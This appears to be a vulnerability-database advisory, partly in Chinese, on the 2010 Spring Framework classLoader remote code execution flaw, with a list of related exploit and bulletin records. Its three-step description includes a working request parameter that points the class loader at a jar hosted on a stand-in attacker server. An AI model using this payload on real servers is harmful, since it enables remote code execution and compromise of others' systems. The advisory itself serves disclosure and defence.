Spring Framework class.classLoader类远程代码执行漏洞

🗓️ 21 Jun 2010 00:00:00Reported by RootType

Spring Framework remote code execution via classLoader

Reporter	Title	Published	Views	Family All 39
Gitee	Exploit for Code Injection in Vmware Spring_Framework	5 May 202217:21	–	gitee
GithubExploit	Exploit for Code Injection in Vmware Spring_Framework	5 Apr 202220:34	–	githubexploit
GithubExploit	Exploit for Code Injection in Oracle Fusion_Middleware	31 Mar 202208:06	–	githubexploit
GithubExploit	Exploit for Code Injection in Vmware Spring_Framework	29 Apr 202209:58	–	githubexploit
GithubExploit	Exploit for Code Injection in Vmware Spring_Framework	31 Mar 202216:14	–	githubexploit
GithubExploit	Exploit for Code Injection in Vmware Spring_Framework	19 May 202223:16	–	githubexploit
IBM Security Bulletins	Security Bulletin: IBM Security Directory Integrator is affected by multiple security vulnerabilities	22 Jun 202316:30	–	ibm
IBM Security Bulletins	Security Bulletin: IBM has announced a release for IBM Security Identity Governance and Intelligence in response to multiple security vulnerabilities	18 Feb 201914:10	–	ibm
Information Security Automation	Spring4Shell, Spring Cloud Function RCE and Spring Cloud Gateway Code Injection	3 Apr 202200:15	–	avleonov
Broadcom	BSA-2022-1770	5 Apr 202200:00	–	broadcom


                                                1. 创建attack.jar并可通过HTTP URL可用。这个jar必须包含有以下内容：

- META-INF/spring-form.tld - 定义spring表单标签并指定实现为标签文件而不是类
- META-INF/tags/中的标签文件，包含有标签定义（任意Java代码）

2. 通过以下HTTP参数向表单控制器提交HTTP请求：
class.classLoader.URLs[0]=jar:http://attacker/attack.jar!/

这会使用攻击者的URL覆盖WebappClassLoader的repositoryURLs属性的第0个元素。

3. 之后org.apache.jasper.compiler.TldLocationsCache.scanJars()会使用 WebappClassLoader的URL解析标签库，会对TLD中所指定的所有标签文件解析攻击者所控制的jar。

21 Jun 2010 00:00Current

9.4High risk

Vulners AI Score9.4

EPSS0.01554